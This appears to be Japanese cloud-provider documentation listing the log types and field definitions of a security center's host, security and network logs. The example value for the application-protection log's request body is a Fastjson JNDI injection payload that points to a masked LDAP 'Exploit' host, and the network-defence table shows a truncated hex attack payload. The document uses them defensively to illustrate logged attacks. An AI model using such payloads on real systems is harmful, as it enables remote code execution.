セキュリティセンターのログを表示して、セキュリティイベントを迅速に特定し、対応します。ログストレージを購入すると、セキュリティセンターは、セキュリティイベントを記録するセキュリティログと、ホストアクティビティを追跡するホストログを自動的に収集します。このトピックでは、サポートされているログの種類とフィールドについて説明します。
サポートされているログの種類
エディション別にサポートされているログの種類
セキュリティセンターのさまざまなエディションでは、さまざまなセキュリティ機能がサポートされているため、ログの種類も異なります。次の表に、各エディションでサポートされているログの種類を示します。
エディション | サポートされているログの種類 |
Anti-virus、Advanced、Enterprise、および Ultimate |
|
Basic |
|
付加価値機能でサポートされているログの種類
次の付加価値機能を使用する場合、セキュリティセンターの有料版を購入する必要はありません。対応する付加価値機能をアクティブ化するだけで済みます。これらの機能をアクティブ化し、セキュリティセンターのログ分析機能を有効にすると、セキュリティセンターは次のログの種類の記録をサポートします。
悪意のあるファイル検出ログ
エージェントレス検出ログ
アプリケーション保護ログ
CSPM - ベースラインチェックログ
CSPM - クラウドサービス構成チェックログ
ログカテゴリ
ホストログ
ログの種類 | __topic__ | 説明 | 収集サイクル |
aegis-log-login | サーバーへのユーザーログインのログを記録します。ログイン時間、ログインユーザー、ログイン方法、ログイン IP アドレスなどの情報が含まれます。 ログインログは、ユーザーアクティビティを監視し、異常な動作を迅速に特定して対応するのに役立ち、システムのセキュリティを確保します。 説明 セキュリティセンターは、Windows Server 2008 オペレーティングシステムのログインログの記録をサポートしていません。 | リアルタイム収集。 | |
aegis-log-network | ネットワーク接続アクティビティのログを記録します。サーバー接続の 5 タプル、接続時間、接続ステータスなどの情報が含まれます。 ネットワーク接続ログは、異常な接続動作の発見、潜在的なネットワーク攻撃の特定、ネットワークパフォーマンスの最適化などに役立ちます。 説明
| リアルタイム収集。 | |
aegis-log-process | サーバー上のプロセス起動に関連するログを記録します。プロセス起動時間、起動コマンド、およびパラメータが含まれます。 プロセス起動ログを記録および分析することにより、システム内のプロセスの起動ステータスと構成情報を理解し、異常なプロセスアクティビティ、マルウェアの侵入、セキュリティの脅威、およびその他の問題を検出できます。 | リアルタイム収集、プロセスの起動はすぐに報告されます。 | |
aegis-log-crack | ブルートフォース攻撃動作のログを記録します。システム、アプリケーション、またはアカウントへのログインとクラッキングの試みが含まれます。 ブルートフォース攻撃ログを記録および分析することにより、システムまたはアプリケーションに対するブルートフォース攻撃を理解し、異常なログイン試行、弱いパスワード、および資格情報の漏洩を検出できます。ブルートフォース攻撃ログは、悪意のあるユーザーを追跡し、フォレンジック分析を実施するためにも使用でき、セキュリティチームのインシデント対応と調査を支援します。 | リアルタイム収集。 | |
aegis-snapshot-host | システムまたはアプリケーション内の詳細なユーザーアカウント情報のログを記録します。ユーザー名、パスワードポリシー、ログイン履歴などの基本的なアカウント属性が含まれます。 異なる時点のアカウントスナップショットログを比較することにより、ユーザーアカウントの変更と進化を理解し、不正なアカウントアクセス、異常なアカウントステータスなど、潜在的なアカウントセキュリティの問題を迅速に検出できます。 |
| |
aegis-snapshot-port | ネットワーク接続のログを記録します。5 タプル、接続ステータス、および関連するプロセス情報フィールドが含まれます。 ネットワーク接続スナップショットログを記録および分析することにより、システム内のアクティブなネットワークソケットを理解し、異常な接続動作の発見、潜在的なネットワーク攻撃の特定、ネットワークパフォーマンスの最適化などに役立ちます。 | ||
aegis-snapshot-process | システム内のプロセスアクティビティのログを記録します。プロセス ID、プロセス名、プロセス起動時間などの情報が含まれます。 プロセススナップショットログを記録および分析することにより、システム内のプロセスのアクティビティステータスとリソース使用量を理解し、異常なプロセス、CPU 使用率、メモリリーク、およびその他の問題を検出できます。 | ||
aegis-log-dns-query | DNS クエリリクエストのログを記録します。クエリ対象のドメイン名、クエリの種類、クエリの送信元などの、サーバーから送信された DNS クエリリクエストに関する詳細情報が含まれます。 DNS リクエストログを分析することにより、ネットワーク内の DNS クエリアクティビティを理解し、異常なクエリ動作、ドメインハイジャック、DNS ポイズニング、およびその他の問題を検出できます。 説明 カーネルバージョンが 4.X.X シリーズより前の Linux サーバーの場合、セキュリティセンターは DNS リクエストログの収集と悪意のある DNS 動作の検出をサポートしていません。包括的な脅威検出機能を得るには、システムカーネルをより高いバージョンにアップグレードすることを検討してください。 | リアルタイム収集。 | |
aegis-log-client | セキュリティセンターエージェントのオンラインおよびオフラインイベントを記録します。 | リアルタイム収集。 |
セキュリティログの種類
ログの種類 | __topic__ | 説明 | 収集サイクル |
sas-vul-log | システムまたはアプリケーションで見つかった脆弱性関連情報のログを記録します。脆弱性名、脆弱性ステータス、処理アクションなどの情報が含まれます。 脆弱性ログを記録および分析することにより、システムの脆弱性、セキュリティリスク、および攻撃トレンドを理解し、適切な修復対策をタイムリーに講じることができます。 | リアルタイム収集。 | |
sas-hc-log | ベースラインリスクチェック結果のログを記録します。ベースラインレベル、ベースラインカテゴリ、リスクレベルなどの情報が含まれます。 ベースラインリスクログを記録および分析することにより、システムのベースラインセキュリティステータスと潜在的なリスクを理解できます。 説明 初めて失敗したチェック項目のデータと、以前に合格したが再チェック時に失敗したチェック項目のデータのみが記録されます。 | ||
sas-security-log | システムまたはアプリケーションで発生するセキュリティイベントとアラート情報のログを記録します。アラートデータソース、アラートの詳細、アラートレベルなどの情報が含まれます。 セキュリティアラートログを記録および分析することにより、システム内のセキュリティイベントと脅威を理解し、適切な対応策をタイムリーに講じることができます。 | ||
sas-cspm-log | クラウドセキュリティポスチャ管理に関連するログを記録します。クラウドセキュリティポスチャ管理からのチェック結果、ホワイトリスト操作などの情報が含まれます。 クラウドセキュリティポスチャ管理ログを記録および分析することにより、クラウドプラットフォームの構成の問題と潜在的なセキュリティリスクを理解できます。 | ||
sas-net-block | ネットワーク攻撃イベントのログを記録します。攻撃の種類、送信元 IP アドレス、宛先 IP アドレス、およびその他の重要な情報が含まれます。 ネットワーク防御ログを記録および分析することにより、ネットワークで発生しているセキュリティイベントを理解し、適切な対応と防御策を講じて、ネットワークのセキュリティと信頼性を向上させることができます。 | ||
sas-rasp-log | アプリケーション保護機能からの攻撃アラート情報のログを記録します。攻撃の種類、行動データ、攻撃者の IP、およびその他の重要な情報が含まれます。 アプリケーション保護アラートログを記録および分析することにより、アプリケーションで発生しているセキュリティイベントを理解し、適切な対応と防御策を講じて、アプリケーションのセキュリティと信頼性を向上させることができます。 | ||
sas-filedetect-log | 悪意のあるファイル検出 SDK 機能を使用した悪意のあるファイル検出のログを記録します。ファイル情報、検出シナリオ、検出結果、および悪意のあるファイル検出に関するその他の情報が含まれます。 悪意のあるファイル検出ログを記録および分析することにより、オフラインファイルと Alibaba Cloud OSS ファイルの一般的なウイルス (ランサムウェア、マイニングプログラムなど) を特定し、迅速に処理して、悪意のあるファイルの拡散と実行を防ぐことができます。 | ||
aegis-file-protect-log | コアファイル監視機能を使用して検出されたアラートイベントを記録します。ファイルパス、ファイルに対して実行された操作、アラートレベル、およびその他の情報が含まれます。 コアファイル監視イベントログを記録および分析することにより、コアファイルが盗まれたり改ざんされたりしていないかどうかを監視できます。 | ||
sas-agentless-log | エージェントレス検出機能を使用して Elastic Compute Service(ECS)、およびイメージで検出されたセキュリティリスクを記録します。脆弱性、ベースライン、悪意のあるサンプル、および機密ファイルが含まれます。 エージェントレス検出ログを記録および分析することにより、さまざまな期間のアセットのセキュリティリスクを表示し、潜在的な脅威を特定して対処するのに役立ちます。 |
ネットワークログ(配信はサポートされなくなりました)
2025 年 3 月 27 日以降、ログ分析機能は、Web アクセスログ、DNS ログ、ネットワークセッションログ、ローカル DNS ログなどのネットワークログの配信をサポートしなくなります。ネットワークログの代替ソリューションについては、「ネットワークログを追加または配信するための代替ソリューション」をご参照ください。
ネットワークログ配信をアクティブ化している場合、このサービスは 2025 年 3 月 27 日に終了し、新しいネットワークログデータは配信されなくなります。セキュリティセンターコンソールの [ログ分析] ページのネットワークログのクエリ機能は廃止されます。
配信されたネットワークログをクエリするには、[ログ分析] ページの右上隅にある [Simple Log Service の詳細管理] をクリックして Simple Log Service コンソールに移動し、付録のログフィールドの説明を参照して配信されたネットワークログを表示できます。
ログの種類 | __topic__ | 説明 | 収集サイクル |
sas-log-http | Web サーバーへのユーザーリクエストと Web サーバーからのレスポンスのログ。ユーザーの IP アドレス、リクエスト時間、リクエストメソッド、リクエスト URL、HTTP ステータスコード、およびレスポンスサイズが含まれます。 Web アクセスログは、Web トラフィックとユーザーの行動を分析し、アクセスパターンと例外を特定し、Web サイトのパフォーマンスを最適化するために使用されます。 | ほとんどの場合、ログはログが生成されてから 1 ~ 12 時間後に収集されます。 | |
sas-log-dns | DNS 解決の詳細のログ。リクエストされたドメイン名、クエリの種類、クライアントの IP アドレス、およびレスポンス値が含まれます。 DNS ログに基づいて、DNS 解決のリクエストとレスポンスのプロセスを監視し、異常な解決動作、DNS ハイジャック、および DNS ポイズニングを特定できます。 | ||
sas-log-session | ネットワーク接続とデータ転送のログ。ネットワークセッションの詳細が含まれます。詳細には、セッションの開始時刻、送信元 IP アドレス、宛先 IP アドレス、プロトコル、およびポートが含まれます。 ネットワークセッションログは、一般的に、ネットワークトラフィックの監視、潜在的な脅威の特定、およびネットワークパフォーマンスの最適化に使用されます。 | ||
local-dns | ローカル DNS サーバー上の DNS クエリとレスポンスのログ。リクエストされたドメイン名、クエリの種類、クライアントの IP アドレス、およびレスポンス値が含まれます。 ネットワーク内の DNS クエリに関する情報を取得し、内部 DNS ログに基づいて、異常なクエリ動作、ドメインハイジャック、DNS ポイズニングなどの問題を特定できます。 |
ホストログフィールド
ログインログ
フィールド名 | 説明 | 例 |
instance_id | インスタンス ID。 | i-2zeg4zldn8zypsfg**** |
host_ip | サーバーの IP アドレス。 | 192.168.XX.XX |
sas_group_name | セキュリティセンターにおいてサーバーが属するアセットグループ。 | default |
uuid | サーバーの UUID。 | 5d83b26b-b7ca-4a0a-9267-12**** |
src_ip | サーバーへのログインに使用される IP アドレス。 | 221.11.XX.XX |
dst_port | サーバーへのログインに使用されるポート。 | 22 |
login_type | ログオンの種類。有効な値は次のとおりです。
| SSH |
username | ログインに使用されるユーザー名。 | admin |
login_count | ログイン試行回数。 1 分以内の繰り返しのログイン試行は 1 つのログに記録されます。たとえば、 | 3 |
start_time | 開始タイムスタンプ。イベントが発生した時刻を示します。単位: 秒。 | 1719472214 |
ネットワーク接続ログ
フィールド名 | 説明 | 例 |
cmd_chain | プロセスチェーン。 | [ { "9883":"bash -c kill -0 -- -'6274'" } ...... ] |
cmd_chain_index | プロセスチェーンのインデックス。インデックスを使用してプロセスチェーンを検索できます。 | B184 |
container_hostname | コンテナ内のサーバーの名前。 | nginx-ingress-controller-765f67fd4d-**** |
container_id | コンテナ ID。 | 4181de1e2b20c3397f1c409266dbd5631d1bc5be7af85246b0d**** |
container_image_id | イメージ ID。 | registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-controller@sha256:5f281994d9e71a1b1a087365271024991c5b0d0543c48f0**** |
container_image_name | イメージ名。 | registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-**** |
container_name | コンテナの名前。 | nginx-ingress-**** |
container_pid | コンテナ内のプロセスの ID。 | 0 |
net_connect_dir | ネットワーク接続の方向。有効な値:
| in |
dst_ip | 宛先 IP アドレス。
| 192.168.XX.XX |
dst_port | 宛先ポート。 | 443 |
instance_id | インスタンス ID。 | i-2zeg4zldn8zypsfg**** |
host_ip | サーバーの IP アドレス。 | 192.168.XX.XX |
parent_proc_name | 親プロセスファイルの名前。 | /usr/bin/bash |
pid | プロセスの ID。 | 14275 |
ppid | 親プロセス ID。 | 14268 |
proc_name | プロセスの名前。 | nginx |
proc_path | プロセスのパス。 | /usr/local/nginx/sbin/nginx |
proc_start_time | プロセスが開始された時刻。 | N/A |
connection_type | プロトコル。有効な値:
| tcp |
sas_group_name | セキュリティセンターにおいてサーバーが属するアセットグループ。 | default |
src_ip | 送信元 IP アドレス。 | 100.127.XX.XX |
ソースポート | 送信元ポート。 | 41897 |
srv_comm | 親プロセスの親プロセスに関連付けられたコマンド名です。 | containerd-shim |
ステータス | ネットワーク接続のステータス。有効な値:
| 5 |
種類 | リアルタイム ネットワーク接続の種類。有効な値:
| リッスン |
uid | プロセスを開始したユーザーの ID です。 | 101 |
ユーザー名 | プロセスを開始したユーザーの名前。 | ルート |
UUID | サーバーの UUID です。 | 5d83b26b-b7ca-4a0a-9267-12**** |
開始時間 | イベント発生時刻を示す開始タイムスタンプ。単位:秒。 | 1719472214 |
プロセス起動ログ
フィールド名 | 説明 | 例 |
cmd_chain | プロセスチェーン。 | [ { "9883":"bash -c kill -0 -- -'6274'" } ...... ] |
cmd_chain_index | プロセスチェーンのインデックス。インデックスを使用してプロセスチェーンを検索できます。 | B184 |
cmd_index | コマンドラインのパラメーターのインデックス。2 つのインデックスごとにグループ化され、パラメーターの開始と終了が識別されます。 | 0,3,5,8 |
cmdline | プロセスを開始するための完全なコマンド。 | ipset list KUBE-6-CLUSTER-IP |
comm | プロセスに関連するコマンド名。 | 該当なし |
container_hostname | コンテナー内のサーバーの名前。 | nginx-ingress-controller-765f67fd4d-**** |
container_id | コンテナー ID。 | 4181de1e2b20c3397f1c409266dbd5631d1bc5be7af85246b0d**** |
container_image_id | イメージ ID。 | registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-controller@sha256:5f281994d9e71a1b1a087365271024991c5b0d0543c48f0**** |
container_image_name | イメージ名。 | registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-**** |
container_name | コンテナーの名前。 | nginx-ingress-**** |
container_pid | コンテナー内のプロセスの ID。 | 0 |
cwd | プロセスの現在の作業ディレクトリ ( CWD )。 | 該当なし |
proc_name | プロセスファイルの名前。 | ipset |
proc_path | プロセスファイルへの完全なパス。 | /usr/sbin/ipset |
gid | プロセスグループの ID。 | 0 |
groupname | ユーザーグループの名前。 | group1 |
instance_id | インスタンスの ID。 | i-2zeg4zldn8zypsfg**** |
host_ip | サーバーの IP アドレス。 | 192.168.XX.XX |
parent_cmd_line | 親プロセスのコマンドライン。 | /usr/local/bin/kube-proxy --config=/var/lib/kube-proxy/config.conf --hostname-override=cn-beijing.192.168.XX.XX |
parent_proc_name | 親プロセスファイルの名前。 | kube-proxy |
parent_proc_path | 親プロセスファイルへの完全なパス。 | /usr/local/bin/kube-proxy |
pid | プロセスの ID。 | 14275 |
ppid | 親プロセス ID。 | 14268 |
proc_start_time | プロセスが開始された時刻。 | 2024-08-01 16:45:40 |
parent_proc_start_time | 親プロセスが開始された時刻。 | 2024-07-12 19:45:19 |
sas_group_name | セキュリティセンターでサーバーが属するアセットグループ。 | default |
srv_cmd | 祖先プロセスのコマンドライン。 | /usr/bin/containerd |
tty | ログインしているターミナル。値 該当なし は、アカウントがターミナルログインに使用されていないことを示します。 | 該当なし |
uid | ユーザー ID。 | 123 |
username | プロセスを開始したユーザーの名前。 | root |
uuid | サーバーの UUID。 | 5d83b26b-b7ca-4a0a-9267-12**** |
start_time | イベントが発生した時刻を示す開始タイムスタンプ。単位:秒。 | 1719472214 |
ブルートフォース攻撃ログ
フィールド名 | 説明 | 例 |
instance_id | インスタンス ID。 | i-2zeg4zldn8zypsfg**** |
host_ip | ブルートフォース攻撃を受けているサーバーの IP アドレス。 | 192.168.XX.XX |
sas_group_name | セキュリティセンターでサーバーが属するアセットグループ。 | default |
uuid | ブルートフォース攻撃を受けているサーバーの UUID。 | 5d83b26b-b7ca-4a0a-9267-12***** |
login_count | ログイン試行の失敗回数。 1 分以内の繰り返しのログイン試行は 1 つのログに記録されます。たとえば、 | 3 |
src_ip | 送信元 IP アドレス。 | 47.92.XX.XX |
dst_port | ログインポート。 | 22 |
login_type | ログインタイプ。有効な値:
| SSH |
username | ログインに使用されるユーザー名。 | user |
start_time | イベントが発生した時刻を示す開始タイムスタンプ。単位: 秒。 | 1719472214 |
アカウントスナップショットログ
フィールド名 | 説明 | 例 |
account_expire | アカウントの有効期限。値 never は、アカウントが期限切れにならないことを示します。 | never |
domain | アカウントが属するドメインまたはディレクトリ。値 N/A は、アカウントがドメインに属していないことを示します。 | N/A |
groups | アカウントが属するグループ。値 N/A は、アカウントがグループに属していないことを示します。 | ["nscd"] |
home_dir | ホームディレクトリ。システム内のファイルの保存と管理に使用されるデフォルトのディレクトリです。 | /Users/abc |
instance_id | インスタンス ID。 | i-2zeg4zldn8zypsfg**** |
host_ip | サーバーの IP アドレス。 | 192.168.XX.XX |
last_chg | パスワードが最後に変更された日付。 | 2022-11-29 |
last_logon | アカウントを使用して開始された最後のログインの日時。値 N/A は、アカウントがログインに使用されていないことを示します。 | 2023-08-18 09:21:21 |
login_ip | アカウントを使用して開始された最後のリモートログインの IP アドレス。値 N/A は、アカウントがログインに使用されていないことを示します。 | 192.168.XX.XX |
passwd_expire | パスワードの有効期限。値 never は、パスワードが期限切れにならないことを示します。 | 2024-08-24 |
perm | アカウントに root 権限があるかどうかを示します。有効な値:
| 0 |
sas_group_name | セキュリティセンターでサーバーが属するアセットグループ。 | default |
shell | Linux シェルコマンド。 | /sbin/nologin |
status | アカウントのステータス。有効な値:
| 0 |
tty | ログインしているターミナル。値 N/A は、アカウントがターミナルログインに使用されていないことを示します。 | N/A |
username | ユーザー名。 | nscd |
uuid | サーバーの UUID。 | 5d83b26b-b7ca-4a0a-9267-12**** |
warn_time | パスワードの有効期限が切れそうになったときに通知される日付。値 never は、通知が送信されないことを示します。 | 2024-08-20 |
start_time | 開始タイムスタンプ。イベントが発生した時刻を示します。単位:秒。 | 1719472214 |
ネットワークスナップショットログ
フィールド名 | 説明 | 例 |
net_connect_dir | ネットワーク接続の方向。有効な値:
| in |
dst_ip | 宛先 IP アドレス。
| 192.168.XX.XX |
dst_port | 宛先ポート。 | 443 |
instance_id | インスタンス ID。 | i-2zeg4zldn8zypsfg**** |
host_ip | サーバーの IP アドレス。 | 192.168.XX.XX |
pid | プロセス ID。 | 682 |
proc_name | プロセス名。 | sshd |
connection_type | プロトコル。有効な値:
| tcp4 |
sas_group_name | セキュリティセンターでサーバーが属するアセットグループ。 | default |
src_ip | 送信元 IP アドレス。 | 100.127.XX.XX |
src_port | 送信元ポート。 | 41897 |
status | ネットワーク接続のステータス。有効な値:
| 5 |
uuid | サーバーの UUID。 | 5d83b26b-b7ca-4a0a-9267-12**** |
start_time | 開始タイムスタンプ。イベントが発生した時刻を示します。単位:秒。 | 1719472214 |
プロセススナップショットログ
フィールド名 | 説明 | 例 |
cmdline | プロセスを開始するための完全なコマンド。 | /usr/local/share/assist-daemon/assist_daemon |
instance_id | インスタンスの ID。 | i-2zeg4zldn8zypsfg**** |
host_ip | サーバーの IP アドレス。 | 192.168.XX.XX |
md5 | バイナリファイルの MD5 ハッシュ値。 説明 サイズは 1 MB を超えるファイルに対しては、MD5 アルゴリズムはサポートされていません。 | 1086e731640751c9802c19a7f53a64f5 |
proc_name | プロセスファイルの名前。 | assist_daemon |
proc_path | プロセスファイルへの完全なパス。 | /usr/local/share/assist-daemon/assist_daemon |
pid | プロセスの ID。 | 1692 |
pname | 親プロセスファイルの名前。 | systemd |
sas_group_name | セキュリティセンターでサーバーが属するアセットグループ。 | default |
proc_start_time | プロセスが開始された時刻。これは組み込みフィールドです。 | 2023-08-18 20:00:12 |
uid | プロセスを開始したユーザーの ID。 | 101 |
username | プロセスを開始したユーザーの名前。 | root |
uuid | サーバーの UUID。 | 5d83b26b-b7ca-4a0a-9267-12**** |
start_time | イベントが発生した時刻を示す開始タイムスタンプ。単位:秒。 | 1719472214 |
DNS リクエストログ
フィールド名 | 説明 | 例 |
domain | DNS リクエストに含まれるドメイン名。 | example.aliyundoc.com |
instance_id | インスタンス ID。 | i-2zeg4zldn8zypsfg**** |
host_ip | DNS リクエストを開始したサーバーの IP アドレス。 | 192.168.XX.XX |
pid | DNS リクエストを開始したプロセスの ID。 | 3544 |
ppid | DNS リクエストを開始した親プロセスの ID。 | 3408 |
cmd_chain | DNS リクエストを開始したプロセスのチェーン。 | "3544":"\"C:\\Program Files (x86)\\Alibaba\\Aegis\\AliDetect\\AliDetect.exe\"" |
cmdline | DNS リクエストを開始したプロセスのコマンドライン。 | C:\Program Files (x86)\Alibaba\Aegis\AliDetect\AliDetect.exe |
proc_path | DNS リクエストを開始したプロセスのパス。 | C:/Program Files (x86)/Alibaba/Aegis/AliDetect/AliDetect.exe |
sas_group_name | サーバーがセキュリティセンターで属するアセットグループ。 | default |
time | DNS リクエストがキャプチャされた時刻。 ほとんどの場合、この値は DNS リクエストが開始された時点です。 | 2023-08-17 20:05:04 |
uuid | DNS リクエストを開始したサーバーの UUID。 | 5d83b26b-b7ca-4a0a-9267-12**** |
start_time | イベントが発生した時刻を示す開始タイムスタンプ。 単位: 秒。 | 1719472214 |
エージェントイベントログ
フィールド名 | 説明 | 例 |
uuid | サーバーの UUID。 | 5d83b26b-b7ca-4a0a-9267-12**** |
host_ip | サーバーの IP アドレス。 | 192.168.XX.XX |
agent_version | セキュリティセンター エージェントのバージョン。 | aegis_11_91 |
last_login | 最後のログインのタイムスタンプ。単位:ミリ秒。 | 1716444387617 |
platform | オペレーティングシステムの種類。有効な値:
| linux |
region_id | サーバーが存在するリージョンの ID。 | cn-beijing |
status | セキュリティセンター エージェントのステータス。有効な値:
| online |
start_time | 開始タイムスタンプ。イベントが発生した時刻を示します。単位:秒。 | 1719472214 |
セキュリティログフィールド
脆弱性ログ
フィールド名 | 説明 | 例 |
vul_alias_name | 脆弱性のエイリアス。 | CESA-2023:1335: openssl セキュリティアップデート |
risk_level | リスクレベル。有効な値:
| later |
extend_content | 脆弱性に関する拡張情報。 | {"cveList":["CVE-2023-0286"],"necessity":{"gmt_create":"20230816","connect_cnt":80,"total_score":0.0,"assets_factor":1.0,"enviroment_factor":1.5,"status":"normal"},"os":"centos","osRelease":"7","preCheck":{},"rpmCanUpdate":true,"rpmEntityList":[{"fullVersion":"1.0.2k-25.el7_9","kernel":false,"matchDetail":"openssl-libs version less than 1.0.2k-26.el7_9","matchList":["openssl-libs version less than 1.0.2k-26.el7_9"],"name":"openssl-libs","nextResult":false,"path":"/etc/pki/tls","result":true,"updateCmd":"yum update openssl-libs","version":"1.0.2k-25.el7_9"},{"fullVersion":"1.0.2k-25.el7_9","kernel":false,"matchDetail":"openssl version less than 1.0.2k-26.el7_9","matchList":["openssl version less than 1.0.2k-26.el7_9"],"name":"openssl","nextResult":false,"path":"/etc/pki/CA","result":true,"updateCmd":"yum update openssl","version":"1.0.2k-25.el7_9"}]} |
instance_id | インスタンス ID。 | i-2zeg4zldn8zypsfg**** |
internet_ip | ホストのパブリック IP アドレス。 | 39.104.XX.XX |
intranet_ip | ホストのプライベート IP アドレス。 | 192.168.XX.XX |
instance_name | ホストの名前。 | hhht-linux-*** |
vul_name | 脆弱性の名前。 | centos:7:cesa-2023:1335 |
operation | 脆弱性に対する操作。有効な値:
| new |
status | ステータス情報。有効な値:
| 1 |
tag | 脆弱性に追加されたタグ。有効な値:
| oval |
type | 脆弱性のタイプ。有効な値:
| sys |
uuid | サーバーの UUID。 | ad66133a-dc82-4e5e-9659-a49e3**** |
start_time | 開始タイムスタンプ。イベントが発生した時刻を示します。単位:秒。 | 1719472214 |
CSPM - ベースラインログ
フィールド名 | 説明 | 例 |
check_item_name | チェック項目の名前。 | パスワード変更の最短間隔を設定する |
check_item_level | ベースラインのリスクレベル。有効な値:
| medium |
check_type | チェック項目のタイプ。 | ID 認証 |
instance_id | インスタンスの ID。 | i-2zeg4zldn8zypsfg**** |
risk_level | リスク項目の重大度。有効な値:
| medium |
operation | 操作。有効な値:
| new |
risk_name | リスク項目の名前。 | パスワードコンプライアンスチェック |
sas_group_name | セキュリティセンター内でサーバーが属するサーバーグループ。リスク項目はサーバー上で検出されます。 | default |
status | ステータス情報。有効な値:
| 1 |
sub_type_alias_name | 中国語でのサブタイプのエイリアス。 | 国際的に合意されたセキュリティのベストプラクティス - Ubuntu 16/18/20/22 セキュリティベースラインチェック |
sub_type_name | サブタイプの名前。ベースラインのサブタイプの詳細については、「ベースラインのタイプとサブタイプ」をご参照ください。 | hc_ubuntu16_cis_rules |
type_alias_name | 中国語でのチェックタイプのエイリアス。 | 国際的に合意されたセキュリティのベストプラクティス |
type_name | ベースラインのタイプ。ベースラインのタイプの詳細については、「ベースラインのタイプとサブタイプ」をご参照ください。 | cis |
uuid | リスク項目が検出されたサーバーの UUID。 | 1ad66133a-dc82-4e5e-9659-a49e3**** |
start_time | 開始タイムスタンプ。イベントが発生した時刻を示します。単位:秒。 | 1719472214 |
セキュリティアラートログ
フィールド名 | 説明 | 例 |
data_source | データソース。有効な値:
| aegis_login_log |
detail | アラートの詳細。 説明 ログの detail フィールドの値は、アラートの種類によって異なります。アラートログを表示する際に detail フィールドのパラメータについて質問がある場合は、チケット を送信してテクニカルサポートにお問い合わせください。 | {"loginSourceIp":"221.11.XX.XX","loginDestinationPort":22,"loginUser":"root","protocol":2,"protocolName":"SSH","clientIp":"192.168.XX.XX","loginTimes":1,"location":"Xi'an","type":"login_common_account","displayEventName":"Logon to an ECS instance by using an unusual account","status":0} |
instance_id | インスタンスの ID。 | i-2zeg4zldn8zypsfg**** |
internet_ip | ホストのパブリック IP アドレス。 | 39.104.XX.XX |
intranet_ip | ホストのプライベート IP アドレス。 | 192.168.XX.XX |
level | アラートの危険度。有効な値:
| suspicious |
name | アラートの名前。 | 異常ログイン - 異常なアカウントを使用して ECS インスタンスにログインする |
operation | 操作。有効な値:
| new |
status | アラートのステータス。有効な値:
| 1 |
unique_info | アラートの UUID。 | 2536dd765f804916a1fa3b9516b5**** |
uuid | アラートが生成されたサーバーの UUID。 | ad66133a-dc82-4e5e-9659-a49e3**** |
start_time | 開始タイムスタンプ。イベントが発生した時刻を示します。単位:秒。 | 1719472214 |
CSPM - クラウドプラットフォーム構成チェックログ
フィールド名 | 説明 | 例 |
check_id | チェック項目の ID です。ListCheckResult 操作を呼び出して、チェック項目の ID をクエリできます。この操作は、クラウド サービスの構成チェックで検出されたリスク項目の詳細をクエリするために使用されます。 | 11 |
check_item_name | チェック項目の名前です。 | オリジンへのバックアップ設定 |
instance_id | インスタンスの ID。 | i-2zeg4zldn8zypsfg**** |
instance_name | インスタンスの名前です。 | lsm |
instance_result | リスクの影響です。値は JSON 文字列です。 | {"Checks":[{}],"Columns":[{"key":"RegionIdShow","search":true,"searchKey":"RegionIdKey","showName":"リージョン","type":"text"},{"key":"InstanceIdShow","search":true,"searchKey":"InstanceIdKey","showName":"インスタンス ID","type":"link"},{"key":"InstanceNameShow","search":true,"searchKey":"InstanceNameKey","showName":"インスタンス名","type":"text"}]} |
instance_sub_type | インスタンスのサブタイプです。有効な値:
| INSTANCE |
instance_type | インスタンスのタイプです。有効な値:
| ECS |
region_id | インスタンスのリージョン ID です。 | cn-hangzhou |
requirement_id | 要件項目 ID です。ListCheckStandard 操作を呼び出して、要件項目の ID をクエリできます。この操作は、構成チェックの基準をクエリするために使用されます。 | 5 |
risk_level | リスクレベルです。有効な値:
| MEDIUM |
section_id | セクション ID です。ListCheckResult 操作を呼び出して、セクション ID をクエリできます。 | 1 |
standard_id | 基準 ID です。ListCheckStandard 操作を呼び出して、基準 ID をクエリできます。 | 1 |
status | チェック項目のステータスです。有効な値:
| PASS |
vendor | クラウド サービス プロバイダーです。値は ALIYUN に固定されています。 | ALIYUN |
start_time | イベントが発生した時刻を示す開始タイムスタンプです。単位: 秒。 | 1719472214 |
ネットワーク防御ログ
フィールド名 | 説明 | 例 |
cmd | 攻撃されたプロセスのコマンドライン。 | nginx: master process nginx |
cur_time | 攻撃イベントが発生した時刻。 | 2023-09-14 09:21:59 |
decode_payload | デコードされた 16 進数ペイロード。 | POST /Services/FileService/UserFiles/ |
dst_ip | 攻撃されたアセットの IP アドレス。 | 172.16.XX.XX |
dst_port | 攻撃されたアセットのポート。 | 80 |
func | ブロックされたイベントのタイプ。有効な値:
| payload |
rule_type | ブロックされたイベントで使用されるルールのタイプ。有効な値:
| alinet_payload |
instance_id | 攻撃されたアセットのインスタンス ID。 | i-2zeg4zldn8zypsfg**** |
internet_ip | 攻撃されたアセットのパブリック IP アドレス。 | 39.104.XX.XX |
intranet_ip | 攻撃されたアセットのプライベート IP アドレス。 | 192.168.XX.XX |
final_action | 防御アクション。値は block に固定されています。この値は、攻撃がブロックされたことを示します。 | block |
payload | 16 進数ペイロード。 | 504f5354202f20485454502f312e310d0a436f6e74656e742d547970653a20746578742f706c61696e0d0a557365722d4167656e743a20**** |
pid | 攻撃されたプロセスの ID。 | 7107 |
platform | 攻撃されたアセットのオペレーティングシステムのタイプ。有効な値:
| linux |
proc_path | 攻撃されたプロセスへのパス。 | /usr/sbin/nginx |
sas_group_name | セキュリティセンター内でサーバーが属するアセットグループ。 | default |
src_ip | 攻撃の送信元 IP アドレス。 | 106.11.XX.XX |
src_port | 攻撃の送信元ポート。 | 29575 |
uuid | サーバーの UUID。 | 5d83b26b-b7ca-4a0a-9267-12**** |
start_time | 開始タイムスタンプ。イベントが発生した時刻を示します。単位:秒。 | 1719472214 |
アプリケーション保護ログ
フィールド名 | 説明 | 例 |
app_dir | アプリケーションが保存されているディレクトリ。 | /usr/local/aegis/rasp/apps/1111 |
app_id | アプリケーションの ID。 | 6492a391fc9b4e2aad94**** |
app_name | アプリケーションの名前。 | test |
confidence_level | 検出アルゴリズムの信頼レベル。有効な値:
| low |
request_body | リクエストボディに関する情報。 | {"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://172.220.XX.XX:1389/Exploit","autoCommit":true} |
request_content_length | リクエストボディの長さ。 | 112 |
data | フック。 | {"cmd":"bash -c kill -0 -- -'31098' "} |
